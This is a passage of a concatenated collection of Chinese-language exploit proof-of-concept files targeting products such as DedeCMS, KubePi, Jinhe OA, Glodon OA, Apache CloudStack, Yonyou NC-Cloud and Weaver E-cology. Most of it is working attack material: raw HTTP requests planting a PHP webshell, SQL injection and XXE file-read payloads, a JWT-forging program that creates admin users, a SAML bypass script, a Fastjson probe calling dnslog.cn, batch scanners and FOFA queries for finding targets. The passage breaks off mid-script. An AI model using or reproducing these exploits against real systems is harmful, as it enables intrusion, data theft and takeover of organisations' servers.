30 | {{unquote("PK\x03\x04\x14\x00\x01\x00\x00\x00\xefl\xfaX\x1c:\xf5\xcb\x11\x00\x00\x00\x05\x00\x00\x00\x08\x00\x00\x001234.txt\xb0\x0c\x01\x08\xd1!\xd1Uv \xfal\x9b\xf4Q\xfd\xf8PK\x01\x02?\x00\x14\x00\x01\x00\x00\x00\xefl\xfaX\x1c:\xf5\xcb\x11\x00\x00\x00\x05\x00\x00\x00\x08\x00$\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x001234.txt\x0a\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x05\x8d\x9d.\x1e\xdf\xda\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00Z\x00\x00\x007\x00\x00\x00\x00\x00")}}
31 | ------WebKitFormBoundaryAU4uQKbpWhA7eME3
32 | Content-Disposition: form-data; name="Button1"
33 |
34 | 模块导入
35 | ------WebKitFormBoundaryAU4uQKbpWhA7eME3--
36 | ```
37 |
38 |
--------------------------------------------------------------------------------
/猎鹰安全(金山)终端安全系统V9 远程代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /inter/software_relation.php HTTP/1.1
3 | Host: 192.168.249.137:6868
4 | Content-Length: 1557
5 | Pragma: no-cache
6 | Cache-Control: no-cache
7 | Upgrade-Insecure-Requests: 1
8 | Origin: http://192.168.249.137:6868
9 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxRP5VjBKdqBrCixM
10 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
11 | AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
12 | Accept-Encoding: gzip, deflate
13 | Accept-Language: zh-CN,zh;q=0.9
14 |
15 | Connection: close ------WebKitFormBoundaryxRP5VjBKdqBrCixM
16 | Content-Disposition: form-data; name="toolFileName" ../../datav.php
17 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM
18 | Content-Disposition: form-data; name="toolDescri"
19 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM
20 | Content-Disposition: form-data; name="id"
21 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM
22 | Content-Disposition: form-data; name="version"
23 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM
24 | Content-Disposition: form-data; name="sofe_typeof"
25 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM
26 | Content-Disposition: form-data; name="fileSize"
27 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM
28 | Content-Disposition: form-data; name="param"
29 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM
30 | Content-Disposition: form-data; name="toolName"
31 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM
32 |
33 | Content-Disposition: form-data; name="toolImage"; filename="3.php" Content-Type: image/png
34 |
35 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM
36 | ```
37 |
38 |
--------------------------------------------------------------------------------
/DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /dede/article_template_rand.php HTTP/1.1
3 | Host: 127.0.0.11
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 | Accept-Encoding: gzip, deflate, br
8 | Content-Type: application/x-www-form-urlencoded
9 | Content-Length: 1065
10 | Origin: http://127.0.0.11
11 | Connection: close
12 | Referer: http://127.0.0.11/dede/article_template_rand.php
13 | Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=89s6bbv2d1unokav5grt4bk2g4; _csrf_name_236f0c58=8f0d4c50bfce77f693ce4b8d93af8be7; _csrf_name_236f0c581BH21ANI1AGD297L1FF21LN02BGE1DNG=23bfa72eb66439a6; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=10acd9938ef3615d; DedeLoginTime=1720185221; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d2b9bcefe628ee47; ENV_GOBACK_URL=%2Fdede%2Fsys_admin_user.php
14 | Upgrade-Insecure-Requests: 1
15 | Sec-Fetch-Dest: iframe
16 | Sec-Fetch-Mode: navigate
17 | Sec-Fetch-Site: same-origin
18 | Sec-Fetch-User: ?1
19 | Priority: u=4
20 |
21 | dopost=save&token=7fa44bfa91d7f797b4c983c76f7c9f9e&templates=%3C%3Fphp%0D%0A%0D%0A%2F%2F%E8%BF%99%E4%B8%AA%E5%80%BC%E4%B8%BA+0+%E8%A1%A8%E7%A4%BA%E5%85%B3%E9%97%AD%E6%AD%A4%E8%AE%BE%E7%BD%AE%EF%BC%8C+%E4%B8%BA+1+%E8%A1%A8%E7%A4%BA%E5%BC%80%E5%90%AF%0D%0A%24cfg_tamplate_rand+%3D+0%3B%0D%0A%0D%0A%2F%2F%E6%A8%A1%E6%9D%BF%E6%95%B0%E7%BB%84%EF%BC%8C%E5%A6%82%E6%9E%9C%E9%9C%80%E8%A6%81%E5%A2%9E%E5%8A%A0%EF%BC%8C%E6%8C%89%E8%BF%99%E4%B8%AA%E6%A0%BC%E5%BC%8F%E5%A2%9E%E5%8A%A0%E6%88%96%E4%BF%AE%E6%94%B9%E5%8D%B3%E5%8F%AF%28%E5%BF%85%E9%A1%BB%E7%A1%AE%E4%BF%9D%E8%BF%99%E4%BA%9B%E6%A8%A1%E6%9D%BF%E6%98%AF%E5%AD%98%E5%9C%A8%E7%9A%84%29%EF%BC%8C%E5%B9%B6%E4%B8%94%E6%95%B0%E9%87%8F%E5%BF%85%E9%A1%BB%E4%B8%BA2%E4%B8%AA%E6%88%96%E4%BB%A5%E4%B8%8A%E3%80%82%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article.htm%27%3B%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article1.htm%27%3B%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article2.htm%27%3B%0D%0A%24a+%3D+%27_POST%27%3B%0D%0A%24%24a%5B1%5D%28%24%24a%5B0%5D%29%3B%0D%0A%3F%3E%0D%0A&imageField1.x=6&imageField1.y=9
22 | ```
23 |
24 |
--------------------------------------------------------------------------------
/金和OA_CarCardInfo.aspx_SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /c6/JHSoft.Web.Vehicle/CarCardInfo.aspx/ HTTP/1.1
3 | Host: your_ip
4 | Content-Length: 2096
5 | Cache-Control: max-age=0
6 | Upgrade-Insecure-Requests: 1
7 | Content-Type: application/x-www-form-urlencoded
8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
9 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
10 | Accept-Encoding: gzip, deflate
11 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
12 | Cookie: ASP.NET_SessionId=dvljrtibwe4dne1nyvda0iw1; myie=false
13 | Connection: close
14 |
15 | _ListPage1LockNumber=1&_ListPage1RecordCount=0&__VIEWSTATE=%2FwEPDwUKMjAyNTc4NzA3NA8WAh4Ic3RyUXVlcnkFCWRlbGZsYWc9MBYCZg9kFgQCAg8PFgIeBFRleHQFBuafpeivomRkAgMPDxYMHglfUGFnZVNpemUCKB4PX1NvcnRBdHRyaWJ1dGVzMtgDAAEAAAD%2F%2F%2F%2F%2FAQAAAAAAAAAMAgAAAFFVc2VyV2ViQ29udHJvbC5EYXRhR3JpZCwgVmVyc2lvbj04LjUuNS4xMDAxLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPW51bGwFAQAAADlVc2VyV2ViQ29udHJvbC5EYXRhR3JpZC5EYXRhR3JpZCtTb3J0QXR0cmlidXRlc0NvbGxlY3Rpb24BAAAAEEF0dHJpYkNvbGxlY3Rpb24EOFVzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK1NvcnRBdHRyaWJ1dGVDb2xsZWN0aW9uAgAAAAIAAAAJAwAAAAUDAAAAOFVzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK1NvcnRBdHRyaWJ1dGVDb2xsZWN0aW9uAQAAABNDb2xsZWN0aW9uQmFzZStsaXN0AxxTeXN0ZW0uQ29sbGVjdGlvbnMuQXJyYXlMaXN0AgAAAAkEAAAABAQAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdAMAAAAGX2l0ZW1zBV9zaXplCF92ZXJzaW9uBQAACAgJBQAAAAAAAAAAAAAAEAUAAAAAAAAACx4MX1JlY29yZENvdW50Zh4HX2J1dHRvbjLsBAABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAADAIAAABRVXNlcldlYkNvbnRyb2wuRGF0YUdyaWQsIFZlcnNpb249OC41LjUuMTAwMSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsBQEAAAAyVXNlcldlYkNvbnRyb2wuRGF0YUdyaWQuRGF0YUdyaWQrQnV0dG9uc0NvbGxlY3Rpb24BAAAAB2J1dHRvbnMEL1VzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK0l0ZW1Db2xsZWN0aW9uAgAAAAIAAAAJAwAAAAUDAAAAL1VzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK0l0ZW1Db2xsZWN0aW9uAQAAABNDb2xsZWN0aW9uQmFzZStsaXN0AxxTeXN0ZW0uQ29sbGVjdGlvbnMuQXJyYXlMaXN0AgAAAAkEAAAABAQAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdAMAAAAGX2l0ZW1zBV9zaXplCF92ZXJzaW9uBQAACAgJBQAAAAEAAAABAAAAEAUAAAAEAAAACQYAAAANAwUGAAAAJVVzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK0l0ZW0EAAAABF9JbWcGX1RpdGxlCF9EaXNwbGF5EV9Eb3NjcmlwdGlvblRpdGxlAQEAAQECAAAABgcAAAA3Li4vSkhzb2Z0LlVJLkxpYi9pbWFnZXMvaWNvbi50b29sYmFyLzE2cHgvZGV0ZXJtaW5lLnBuZwYIAAAABuehruWumgEGCQAAAAALHglfSWRlbnRpZnkCAR4LX2RhdGFTb3VyY2UFaTxyb290PjxyZWNvcmQ%2BPElEPjwvSUQ%2BPGl0ZW0gQ29sdW1uTmFtZT0n6L2m5Z6LJz48L2l0ZW0%2BPGl0ZW0gQ29sdW1uTmFtZT0n54mM54WnJz48L2l0ZW0%2BPC9yZWNvcmQ%2BPC9yb290PmRkZJju89%2Fcb0ViP%2BHqYZwpEbj%2BGmY0EecUW2zJyvdwmUng&txt_CarType=1');WAITFOR DELAY '0:0:5'--&txt_CarCode=1&bt_Search=%B2%E9%D1%AF&__VIEWSTATEGENERATOR=0A1FC31B&__EVENTTARGET=&__EVENTARGUMENT=
16 | ```
17 |
18 |
--------------------------------------------------------------------------------
/KubePi存在JWT验证绕过漏洞.md:
--------------------------------------------------------------------------------
1 | fofa
2 |
3 | ```
4 | "kubepi"
5 | ```
6 |
7 | 使用空密钥生成jwt token
8 |
9 | ```
10 | eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4
11 | ```
12 |
13 | 使用生成的密钥创建用户tang
14 |
15 | ```
16 | POST /kubepi/api/v1/users HTTP/1.1
17 | Host: 127.0.0.1:9982
18 | Content-Length: 248
19 | sec-ch-ua:
20 | Accept: application/json, text/plain, */*
21 | lang: zh-CN
22 | Content-Type: application/json
23 | sec-ch-ua-mobile: ?0
24 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
25 | sec-ch-ua-platform: ""
26 | Origin: http://127.0.0.1:9982
27 | Sec-Fetch-Site: same-origin
28 | Sec-Fetch-Mode: cors
29 | Sec-Fetch-Dest: empty
30 | Referer: http://127.0.0.1:9982/kubepi/user-management/users/create
31 | Accept-Encoding: gzip, deflate
32 | Accept-Language: zh-CN,zh;q=0.9
33 | Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4
34 | Connection: close
35 |
36 | {"apiVersion":"v1","kind":"User","name":"tang","roles":["Common User","Manage Image Registries","Manage Clusters","Manage RBAC"],"nickName":"tang","email":"tang@qq.com","authenticate":{"password":"12345678@Tang"},"mfa":{"enable":false,"secret":""}}
37 | ```
38 |
39 | 
40 |
41 | 生成jwt 程序
42 |
43 | ```
44 | package main
45 |
46 | import(
47 | "fmt"
48 | "github.com/kataras/iris/v12/middleware/jwt"
49 | "time"
50 | )
51 |
52 | var jwtMaxAge =100000* time.Minute
53 |
54 | typeUserProfilestruct{
55 | Namestring`json:"name"`
56 | NickNamestring`json:"nickName"`
57 | Emailstring`json:"email"`
58 | Languagestring`json:"language"`
59 | ResourcePermissionsmap[string][]string`json:"resourcePermissions"`
60 | IsAdministratorbool`json:"isAdministrator"`
61 | MfaMfa`json:"mfa"`
62 | }
63 |
64 | typeMfastruct{
65 | Enablebool`json:"enable"`
66 | Secretstring`json:"secret"`
67 | Approvedbool`json:"approved"`
68 | }
69 |
70 | func main(){
71 | jwtSigner := jwt.NewSigner(jwt.HS256,"", jwtMaxAge)
72 | test :=map[string][]string{}
73 | profile :=UserProfile{
74 | Name:"admin",
75 | NickName:"Administrator",
76 | Email:"support@fit2cloud.com",
77 | Language:"zh-CN",
78 | ResourcePermissions: test,
79 | IsAdministrator:true,
80 | Mfa:Mfa{
81 | Secret:"",
82 | Enable:false,
83 | Approved:false,
84 | },
85 | }
86 | nonejwt, _ := jwtSigner.Sign(profile)
87 | fmt.Println(string(nonejwt))
88 | }
89 | ```
90 |
91 |
--------------------------------------------------------------------------------
/广联达OA接口ArchiveWebService存在XML实体注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1
3 | Host:
4 | Content-Type: text/xml; charset=utf-8
5 | Content-Length: length
6 | SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArchiveInfo"
7 |
8 |
9 |
10 |
11 |
12 | <!DOCTYPE Archive [
<!ENTITY secret SYSTEM "file:///windows/win.ini">
]>
<Archive>
<ArchiveInfo>
<UploaderID>
############
&secret;
##############
</UploaderID>
</ArchiveInfo>
<Result>
<MainDoc>Document Content</MainDoc>
</Result>
<DocInfo>
<DocTypeID>1</DocTypeID>
<DocVersion>1.0</DocVersion>
</DocInfo>
</Archive>
13 | string
14 | string
15 |
16 |
17 |
18 | ```
19 |
20 |
--------------------------------------------------------------------------------
/广联达Linkworks ArchiveWebService XML实体注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1
4 | Host:
5 | Content-Type: text/xml; charset=utf-8
6 | Content-Length: length
7 | SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArchiveInfo"
8 |
9 |
10 |
11 |
12 | <!DOCTYPE Archive [
<!ENTITY secret SYSTEM "file:///windows/win.ini">
]>
<Archive>
<ArchiveInfo>
<UploaderID>
############
&secret;
##############
</UploaderID>
</ArchiveInfo>
<Result>
<MainDoc>Document Content</MainDoc>
</Result>
<DocInfo>
<DocTypeID>1</DocTypeID>
<DocVersion>1.0</DocVersion>
</DocInfo>
</Archive>
13 | string
14 | string
15 |
16 |
17 |
18 | ```
19 |
20 |
--------------------------------------------------------------------------------
/Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107).md:
--------------------------------------------------------------------------------
1 | ```
2 | import requests
3 | from bs4 import BeautifulSoup
4 | from datetime import datetime, timedelta
5 | import xml.etree.ElementTree as ET
6 | import base64
7 | import logging
8 |
9 | # Setup logging
10 | logging.basicConfig(filename='exploit.log', level=logging.INFO, format='%(asctime)s - %(message)s')
11 |
12 | # URL of the login endpoint
13 | url = "http://target-cloudstack-instance.com/client/api"
14 |
15 | # Function to generate dynamic SAML response
16 | def generate_saml_response(username):
17 | issue_instant = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
18 | not_on_or_after = (datetime.utcnow() + timedelta(hours=1)).strftime('%Y-%m-%dT%H:%M:%SZ')
19 |
20 | saml_response = f"""
21 |
22 | http://your-saml-issuer.com
23 |
24 |
25 |
26 |
27 | http://your-saml-issuer.com
28 |
29 | {username}
30 |
31 |
32 |
33 |
34 |
35 |
36 | {url}
37 |
38 |
39 |
40 |
41 | urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport
42 |
43 |
44 |
45 |
46 | """
47 | return base64.b64encode(saml_response.encode('utf-8')).decode('utf-8')
48 |
49 | # List of usernames to attempt access
50 | usernames = ["user1@example.com", "user2@example.com", "admin@example.com"]
51 |
52 | # Function to attempt login with SAML response
53 | def attempt_login(saml_response):
54 | data = {
55 | "command": "samlSsoLogin",
56 | "SAMLResponse": saml_response
57 | }
58 | response = requests.post(url, data=data)
59 |
60 | if response.status_code == 200:
61 | soup = BeautifulSoup(response.text, 'html.parser')
62 | session_id = soup.find('sessionid')
63 | if session_id:
64 | logging.info(f"Login successful, session ID: {session_id.text}")
65 | print(f"Login successful, session ID: {session_id.text}")
66 | else:
67 | logging.info("Login failed, no session ID found in response.")
68 | print("Login failed, no session ID found in response.")
69 | else:
70 | logging.info(f"Login failed, status code: {response.status_code}")
71 | print(f"Login failed, status code: {response.status_code}")
72 |
73 | # Attempt login for each username
74 | for username in usernames:
75 | saml_response = generate_saml_response(username)
76 | attempt_login(saml_response)
77 | ```
78 |
79 |
--------------------------------------------------------------------------------
/润乾报表dataSphereServlet接口 任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | POST /demo/servlet/dataSphereServlet?action=11 HTTP/1.1
4 | Host: 192.168.31.133:6868
5 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 | Accept-Language: en-US,en;q=0.5
8 | Accept-Encoding: gzip, deflate
9 | Referer: http://192.168.31.133:6868/demo/
10 | Connection: close
11 | Upgrade-Insecure-Requests: 1
12 | Content-Type: application/x-www-form-urlencoded
13 | Content-Length: 54
14 |
15 | path=../../../WEB-INF/raqsoftConfig.xml&content=&mode=
16 | ```
17 |
18 | Nuclei:
19 |
20 | ```
21 |
22 | id: runqianbaobiaowenjianduqu-DEMO
23 |
24 | info:
25 | name: 润乾报表dataSphereServlet接口 任意文件读取漏洞-DEMO
26 | author: 紫色皓月
27 | severity: high
28 | description: 润乾报表dataSphereServlet接口 任意文件读取漏洞-DEMO
29 | tags: 2024,润乾报表,任意文件读取,DEMO
30 |
31 | requests:
32 | - raw:
33 | - |
34 | POST /demo/servlet/dataSphereServlet?action=11 HTTP/1.1
35 | Host: {{Hostname}}
36 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
37 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
38 | Accept-Language: en-US,en;q=0.5
39 | Accept-Encoding: gzip, deflate
40 | Referer: http://{{Hostname}}/demo/
41 | Connection: close
42 | Upgrade-Insecure-Requests: 1
43 | Content-Type: application/x-www-form-urlencoded
44 | Content-Length: 54
45 |
46 | path=../../../WEB-INF/raqsoftConfig.xml&content=&mode=
47 |
48 | req-condition: true
49 | matchers:
50 | - type: word
51 | words:
52 | - ''
53 | ```
54 |
55 |
56 |
57 |
58 |
59 | 无demo
60 |
61 | ```
62 | POST /servlet/dataSphereServlet?action=11 HTTP/1.1
63 | Host: 192.168.31.133:6868
64 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
65 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
66 | Accept-Language: en-US,en;q=0.5
67 | Accept-Encoding: gzip, deflate
68 | Referer: http://192.168.31.133:6868/
69 | Connection: close
70 | Upgrade-Insecure-Requests: 1
71 | Content-Type: application/x-www-form-urlencoded
72 | Content-Length: 54
73 |
74 | path=../../../WEB-INF/raqsoftConfig.xml&content=&mode=
75 | ```
76 |
77 | ```
78 | id: runqianbaobiaowenjianduqu
79 |
80 | info:
81 | name: 润乾报表dataSphereServlet接口 任意文件读取漏洞
82 | author: 紫色皓月
83 | severity: high
84 | description: 润乾报表dataSphereServlet接口 任意文件读取漏洞
85 | tags: 2024,润乾报表,任意文件读取
86 |
87 | requests:
88 | - raw:
89 | - |
90 | POST /servlet/dataSphereServlet?action=11 HTTP/1.1
91 | Host: {{Hostname}}
92 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
93 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
94 | Accept-Language: en-US,en;q=0.5
95 | Accept-Encoding: gzip, deflate
96 | Referer: http://{{Hostname}}/
97 | Connection: close
98 | Upgrade-Insecure-Requests: 1
99 | Content-Type: application/x-www-form-urlencoded
100 | Content-Length: 54
101 |
102 | path=../../../WEB-INF/raqsoftConfig.xml&content=&mode=
103 |
104 | req-condition: true
105 | matchers:
106 | - type: word
107 | words:
108 | - ''
--------------------------------------------------------------------------------
/用友NC-Cloud接口blobRefClassSearch存在FastJson反序列化漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1
3 | Host: x.x.x.x
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36
5 | Content-Type: application/json
6 |
7 | {"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"Test.Fastjson.dnslog.cn\"}}}"}
8 | ```
9 |
10 | fofa
11 |
12 | ```
13 | app="用友-NC-Cloud"
14 | ```
15 |
16 |
17 |
18 |
19 |
20 | 批量脚本
21 |
22 | ```
23 | # encoding:utf-8
24 | import time
25 | import requests
26 | import argparse
27 | import ssl
28 | import urllib3
29 | import re
30 | from requests.exceptions import RequestException
31 | from urllib3.exceptions import InsecureRequestWarning
32 |
33 | # ssl._create_unverified_context:创建一个 SSL 上下文,用于处理 HTTPS 请求时不验证服务器证书的情况。
34 | ssl._create_default_https_context = ssl._create_unverified_context
35 | # urllib3.disable_warnings():禁用 urllib3 库的不安全请求警告,即不显示由于不安全的 HTTPS 请求而引发的警告信息。
36 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
37 |
38 |
39 | # 打印颜色
40 | RED = '\033[31m'
41 | GREEN = '\033[32m'
42 | RESET = '\033[0m'
43 |
44 |
45 | def check_vuln(url):
46 | url = url.strip("/")
47 | target = url + "/ncchr/pm/ref/indiIssued/blobRefClassSearch"
48 | headers = {
49 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
50 | 'Content-Type': 'application/json'
51 | }
52 | headers1 = {
53 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
54 | "Cookie": "PHPSESSID=pgqapiopj5rssr6a2ejvsi69m3; b-user-id=98195658-f7ad-f233-35b2-5f6d469d240d"
55 | }
56 | dnslog_url = "http://dnslog.cn/getdomain.php"
57 | try:
58 | getdomain = requests.get(dnslog_url, headers=headers1, verify=False, timeout=20)
59 | domain = str(getdomain.text)
60 | data = f'{{"clientParam":"{{\\"x\\":{{\\"@type\\":\\"java.net.InetSocketAddress\\"{{\\"address\\":,\\"val\\":\\"111111.{domain}\\"}}}}}}"}}'
61 | response = requests.post(target, headers=headers, data=data, verify=False, timeout=20)
62 | for i in range(0, 3):
63 | refresh = requests.get(url='http://dnslog.cn/getrecords.php', headers=headers1, timeout=60)
64 | time.sleep(2)
65 | if domain in refresh.text:
66 | print(f"{RED}[+] {url} 存在YongYouNC-Cloud-blobRefClassSearch-fastjson反序列化漏洞{RESET}")
67 | return True
68 | else:
69 | print(f"{GREEN}[+] {url} 不存在YongYouNC-Cloud-blobRefClassSearch-fastjson反序列化漏洞{RESET}")
70 | except requests.exceptions.RequestException as e:
71 | print(f"{GREEN}[-] {url} 请求失败{RESET}")
72 |
73 |
74 | def main():
75 | parser = argparse.ArgumentParser(description='YongYouNC-Cloud-blobRefClassSearch-Fastjson反序列化漏洞检测')
76 | parser.add_argument('-u', '--url', help='目标URL')
77 | parser.add_argument('-f', '--file', help='目标URL文件')
78 |
79 | args = parser.parse_args()
80 |
81 | if args.url:
82 | url = "http://" + args.url if not args.url.startswith(('http://', 'https://')) else args.url
83 | check_vuln(url)
84 | elif args.file:
85 | with open(args.file, 'r') as f:
86 | urls = f.read().splitlines()
87 | for url in urls:
88 | url = "http://" + url if not url.startswith(('http://', 'https://')) else url
89 | check_vuln(url)
90 |
91 |
92 | if __name__ == '__main__':
93 | main()
94 |
95 | ```
96 |
97 |
--------------------------------------------------------------------------------
/泛微E-cology9 browserjsp SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```python
2 | import argparse
3 | import requests
4 | from termcolor import colored
5 | import signal
6 |
7 | requests.packages.urllib3.disable_warnings()
8 | output_file = None
9 |
10 | def check_url(url, output=None):
11 | headers = {
12 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
13 | "Accept-Encoding": "gzip, deflate",
14 | "Accept-Language": "zh-CN,zh;q=0.9",
15 | "Connection": "close"
16 | }
17 | proxies = {
18 | 'http': 'http://127.0.0.1:8080',
19 | 'https': 'https://127.0.0.1:8080'
20 | }
21 |
22 | data = {
23 | "isDis": "1",
24 | "browserTypeId": "269",
25 | "keyword": "%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%35%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37"
26 | }
27 |
28 | try:
29 | modified_url = url + '/mobile/%20/plugin/browser.jsp'
30 | response = requests.post(modified_url, data=data, headers=headers, verify=False, timeout=3)
